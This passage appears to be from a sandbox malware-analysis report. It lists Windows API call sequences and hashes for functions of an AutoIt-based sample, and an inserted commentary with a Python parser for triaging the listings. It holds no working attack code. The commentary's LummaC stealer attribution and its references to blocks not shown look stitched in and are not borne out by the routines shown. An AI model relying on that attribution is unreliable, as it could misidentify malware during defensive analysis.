                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                                        • API String ID: 1212759294-1154884017
                                                                                                                                        • Opcode ID: 1d6e2ecae52539bf0cbbad322a6d7af73b4ab64b07af29f81ae04a8dcf8a72ec
                                                                                                                                        • Instruction ID: 15e5d4ddd9039caeb482c6cfde18e14042d6748c429b669d7c330a3406f572f8
                                                                                                                                        • Opcode Fuzzy Hash: 1d6e2ecae52539bf0cbbad322a6d7af73b4ab64b07af29f81ae04a8dcf8a72ec
                                                                                                                                        • Instruction Fuzzy Hash: C061CCB1900619FAEF14DF64DC8ABBE7FA8FB08710F104209F915D61D1DB75AA84DBA0
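The function blocks above all share one layout: an "APIs" list of call sites (with nested "Part of subcall function" lines for callees), followed by the memory-dump source and the similarity hashes. The strings they carry (tooltips_class32, @GUI_DRAGFILE/@GUI_DRAGID/@GUI_DROPID, the CHECK/COLLAPSE/EXPAND/GETITEMCOUNT command set) match the AutoIt runtime's GUI and ControlTreeView code, so these particular routines are interpreter plumbing rather than stealer logic; the API sequences are still what you pivot on across reports. The parser below is an added example (not part of this report or of Joe Sandbox's tooling) that turns one "APIs" listing into structured records so the call sequence, the API set and the SendMessageW message numbers can be compared mechanically. It assumes the line format exactly as rendered on this page; the sample input is constructed from the tooltip-creation block above and the helper names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: lines copied from the "APIs" listing of one
# function block in this report (the tooltip-creation routine), including
# one nested "Part of subcall function" line.
SAMPLE_APIS = """\
• _memset.LIBCMT ref: 0059A87E
• DestroyWindow.USER32(00000000,?), ref: 0059A8F8
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0059A972
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0059A994
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0059A9A7
• GetDesktopWindow.USER32 ref: 0059AA32
  • Part of subcall function 005129AB: GetWindowLongW.USER32(?,000000EB), ref: 005129BC
"""

# One API line: optional subcall prefix, "Name.MODULE", optional "(args)",
# then "ref: <hex call-site address>". Argument values are hex or "?" (not
# recovered by the analysis); string arguments such as tooltips_class32
# appear verbatim.
_API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when listed as "Part of subcall function"

    @property
    def is_direct(self) -> bool:
        return self.subcall_of is None


def parse_api_block(text: str) -> List[ApiCall]:
    """Parse one "APIs" listing into ApiCall records, preserving order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = _API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        raw_args = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=raw_args.split(",") if raw_args else [],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def direct_call_sequence(calls: List[ApiCall]) -> List[str]:
    """API names called directly by the function, in call-site order."""
    return [c.api for c in calls if c.is_direct]


def api_set(calls: List[ApiCall]) -> List[str]:
    """Sorted, de-duplicated "Name.MODULE" list, usable as a pivot key across reports."""
    return sorted({f"{c.api}.{c.module}" for c in calls})


def send_message_ids(calls: List[ApiCall]) -> List[int]:
    """Window message numbers passed as the second SendMessageW argument.

    Compare these against WinUser.h / CommCtrl.h: 0x432 and 0x433 are
    TTM_ADDTOOLW and TTM_DELTOOLW (WM_USER+50 and WM_USER+51), i.e. tooltip
    management, which is why this routine is GUI code and not stealer logic.
    """
    ids = set()
    for c in calls:
        if c.api == "SendMessageW" and len(c.args) >= 2 and c.args[1] != "?":
            ids.add(int(c.args[1], 16))
    return sorted(ids)


if __name__ == "__main__":
    parsed = parse_api_block(SAMPLE_APIS)
    for call in parsed:
        nest = "" if call.is_direct else f"(via sub_{call.subcall_of:08X}) "
        print(f"{call.ref:08X} {nest}{call.api}.{call.module}{call.args}")
    print("api set:", api_set(parsed))
    print("message ids:", [hex(i) for i in send_message_ids(parsed)])
```

Run it over each "APIs" block of interest and diff the api_set output between samples: blocks whose direct call sequence and message numbers match this one are the same AutoIt runtime routine and can be skipped during triage, while blocks that do not resolve to known library code are where the decrypted LummaC payload logic will be.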
                                                                                                                                        APIs
                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0057E31F
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0057E32F
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0057E33B
                                                                                                                                        • __wsplitpath.LIBCMT ref: 0057E399
                                                                                                                                        • _wcscat.LIBCMT ref: 0057E3B1
                                                                                                                                        • _wcscat.LIBCMT ref: 0057E3C3
                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0057E3D8
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E3EC
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E41E
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0057E43F
                                                                                                                                        • _wcscpy.LIBCMT ref: 0057E44B
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0057E48A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 3566783562-438819550
                                                                                                                                        • Opcode ID: de947745dada0322bf23adb0ddca0c5ba07a1b0ad35bbaee52cb2dcbb5c2b0b8
                                                                                                                                        • Instruction ID: f02ce819c0974cf88bbf3cffc929cfb49815c823d887353d9ee143919a002270
                                                                                                                                        • Opcode Fuzzy Hash: de947745dada0322bf23adb0ddca0c5ba07a1b0ad35bbaee52cb2dcbb5c2b0b8
                                                                                                                                        • Instruction Fuzzy Hash: 076189765047069FCB10EF60D849A9EBBE8FF89310F04895EF98983251EB31E945CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00511F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512412,?,00000000,?,?,?,?,00511AA7,00000000,?), ref: 00511F76
                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005124AF
                                                                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0051254A
                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0054BFE7
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054C018
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054C02F
                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00511AA7,00000000,?,?,00511EBE,?,?), ref: 0054C04B
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0054C05D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                        • String ID: hZ
                                                                                                                                        • API String ID: 641708696-3824762921
                                                                                                                                        • Opcode ID: c6210797d1e6f6c4f896f1d33700be9e1eb1aa485c8f32716c5a623f426e9d5c
                                                                                                                                        • Instruction ID: 0aff48e526d4383e81409f2e88cad8d1abfb5d03c0cffce2d75f58479fe886cf
                                                                                                                                        • Opcode Fuzzy Hash: c6210797d1e6f6c4f896f1d33700be9e1eb1aa485c8f32716c5a623f426e9d5c
                                                                                                                                        • Instruction Fuzzy Hash: 6B61DF30116605DFEB359F14C84CBAA7FF1FB94316F50991AE4464BAA0C3B1A8E4EF90
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0057A2C2
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0057A2E3
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A33C
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A355
                                                                                                                                        • _wprintf.LIBCMT ref: 0057A3FC
                                                                                                                                        • _wprintf.LIBCMT ref: 0057A41A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 311963372-3080491070
                                                                                                                                        • Opcode ID: 49a2584878d71ceb14142aa8457fdf80f412eac40c4a10bc1b38b4014b49eda5
                                                                                                                                        • Instruction ID: d6df841c4fdeb55bed42575599aaa06f4f5ae55c4ab01cb1254489301b5a7b29
                                                                                                                                        • Opcode Fuzzy Hash: 49a2584878d71ceb14142aa8457fdf80f412eac40c4a10bc1b38b4014b49eda5
                                                                                                                                        • Instruction Fuzzy Hash: 2451B37190151AAACF14EBE0ED4AEEEBF79BF65340F104165F405B2092EB312F58DB91
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0055F8B8,00000001,0000138C,00000001,00000000,00000001,?,00583FF9,00000000), ref: 0057009A
                                                                                                                                        • LoadStringW.USER32(00000000,?,0055F8B8,00000001), ref: 005700A3
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,005D7310,?,00000FFF,?,?,0055F8B8,00000001,0000138C,00000001,00000000,00000001,?,00583FF9,00000000,00000001), ref: 005700C5
                                                                                                                                        • LoadStringW.USER32(00000000,?,0055F8B8,00000001), ref: 005700C8
                                                                                                                                        • __swprintf.LIBCMT ref: 00570118
                                                                                                                                        • __swprintf.LIBCMT ref: 00570129
                                                                                                                                        • _wprintf.LIBCMT ref: 005701D2
                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 005701E9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                                        • Opcode ID: 6d5b3b6641c19b80ec2c836e5dfd98204eff1894cade7ff00fa49988169ebf75
                                                                                                                                        • Instruction ID: 2d44fdeb2488dec5711873f7fc721de38eb3404a68767414350bf44068775739
                                                                                                                                        • Opcode Fuzzy Hash: 6d5b3b6641c19b80ec2c836e5dfd98204eff1894cade7ff00fa49988169ebf75
                                                                                                                                        • Instruction Fuzzy Hash: CC41437280052AAACB14FBE0DD4ADEFBB78BFA5340F500155F505B20D2DA305F48DAA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0057AA0E
                                                                                                                                        • GetDriveTypeW.KERNEL32 ref: 0057AA5B
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057AAA3
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057AADA
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057AB08
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                        • API String ID: 2698844021-4113822522
                                                                                                                                        • Opcode ID: b92d9f4bee4107e9b84676d610a19edef474e6a5a0b36a58edec2d19fde5d813
                                                                                                                                        • Instruction ID: 983f1254dddfb4c32b4f5d532edda45e46c1a2697e32215e06f708d7c2f849bb
                                                                                                                                        • Opcode Fuzzy Hash: b92d9f4bee4107e9b84676d610a19edef474e6a5a0b36a58edec2d19fde5d813
                                                                                                                                        • Instruction Fuzzy Hash: E1516B711047069FD700EF10D886D6BBBE4FF95758F10892CF899572A1DB31AE09CB92
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0057A852
                                                                                                                                        • __swprintf.LIBCMT ref: 0057A874
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057A8B1
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0057A8D6
                                                                                                                                        • _memset.LIBCMT ref: 0057A8F5
                                                                                                                                        • _wcsncpy.LIBCMT ref: 0057A931
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0057A966
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0057A971
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0057A97A
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0057A984
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 2fd27d11aa5f957f43e827739a80d9c7e73e9eace103983782fa61f19f070c75
• Instruction ID: 0c4cf1fdc72db4fe58ebcc715fec8508bef362dcee88efdc7c433dd4dd3dee68
• Opcode Fuzzy Hash: 2fd27d11aa5f957f43e827739a80d9c7e73e9eace103983782fa61f19f070c75
• Instruction Fuzzy Hash: 6931C17291021AABDB219FA0DC49FEF7BBCFFC9700F1041A6F608D20A0E77096449B25
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0059982C,?,?), ref: 0059C0C8
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C0DF
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C0EA
• CloseHandle.KERNEL32(00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C0F7
• GlobalLock.KERNEL32(00000000), ref: 0059C100
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C10F
• GlobalUnlock.KERNEL32(00000000), ref: 0059C118
• CloseHandle.KERNEL32(00000000,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C11F
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0059982C,?,?,00000000,?), ref: 0059C130
• OleLoadPicture.OLEAUT32(?,00000000,00000000,005A3C7C,?), ref: 0059C149
• GlobalFree.KERNEL32(00000000), ref: 0059C159
• GetObjectW.GDI32(00000000,00000018,?), ref: 0059C17D
• CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0059C1A8
• DeleteObject.GDI32(00000000), ref: 0059C1D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0059C1E6
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: ec1b7e5954685e7d6a35b0a709944a5ed66e170887faa4fe33491fad6b3c0810
• Instruction ID: 03fcd8c0ba3c179a8cf4366f8e983cc38b17133eedf18cbdd1b80bed20d7e7aa
• Opcode Fuzzy Hash: ec1b7e5954685e7d6a35b0a709944a5ed66e170887faa4fe33491fad6b3c0810
• Instruction Fuzzy Hash: 49412775600208AFCB219F64DC8CEAE7FB8FF9A721F104058F906A72A0D7309945EB60
APIs
  • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0059C8A4
• GetFocus.USER32 ref: 0059C8B4
• GetDlgCtrlID.USER32(00000000), ref: 0059C8BF
• _memset.LIBCMT ref: 0059C9EA
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0059CA15
• GetMenuItemCount.USER32(?), ref: 0059CA35
• GetMenuItemID.USER32(?,00000000), ref: 0059CA48
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0059CA7C
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0059CAC4
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0059CAFC
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0059CB31
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: c2223b9aec5085ce30443f28c8f2bcc5503743f86149c22ecc0e7b87ff05474e
• Instruction ID: 398888b102756c7273a9264163f0d955efab9240d52a2972c3358983a887786d
• Opcode Fuzzy Hash: c2223b9aec5085ce30443f28c8f2bcc5503743f86149c22ecc0e7b87ff05474e
• Instruction Fuzzy Hash: 42819B71608306AFDB20CF14C989A6BBFE9FF89354F00492EF99597291D730D905DBA2
APIs
  • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00568E3C
  • Part of subcall function 00568E20: GetLastError.KERNEL32(?,00568900,?,?,?), ref: 00568E46
  • Part of subcall function 00568E20: GetProcessHeap.KERNEL32(00000008,?,?,00568900,?,?,?), ref: 00568E55
  • Part of subcall function 00568E20: HeapAlloc.KERNEL32(00000000,?,00568900,?,?,?), ref: 00568E5C
  • Part of subcall function 00568E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00568E73
  • Part of subcall function 00568EBD: GetProcessHeap.KERNEL32(00000008,00568916,00000000,00000000,?,00568916,?), ref: 00568EC9
  • Part of subcall function 00568EBD: HeapAlloc.KERNEL32(00000000,?,00568916,?), ref: 00568ED0
  • Part of subcall function 00568EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00568916,?), ref: 00568EE1
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00568B2E
• _memset.LIBCMT ref: 00568B43
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00568B62
• GetLengthSid.ADVAPI32(?), ref: 00568B73
• GetAce.ADVAPI32(?,00000000,?), ref: 00568BB0
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00568BCC
• GetLengthSid.ADVAPI32(?), ref: 00568BE9
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00568BF8
• HeapAlloc.KERNEL32(00000000), ref: 00568BFF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00568C20
• CopySid.ADVAPI32(00000000), ref: 00568C27
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00568C58
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00568C7E
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00568C92
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
• Instruction ID: dc707083eda30d4e68ccbe680dc64b00683ded9029c783b36475f794b6e0c5c1
• Opcode Fuzzy Hash: e5a074a29140d2b28a9acab88cf9cf65d38f3cdd9f93d41129383c6aa9f17629
• Instruction Fuzzy Hash: 9B61577190020AAFDF109FA1DC48EFEBB79FF15300F048269E925AB290DB359E05DB60
APIs
• GetDC.USER32(00000000), ref: 00587A79
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00587A85
• CreateCompatibleDC.GDI32(?), ref: 00587A91
• SelectObject.GDI32(00000000,?), ref: 00587A9E
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00587AF2
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00587B2E
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00587B52
• SelectObject.GDI32(00000006,?), ref: 00587B5A
• DeleteObject.GDI32(?), ref: 00587B63
• DeleteDC.GDI32(00000006), ref: 00587B6A
• ReleaseDC.USER32(00000000,?), ref: 00587B75
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
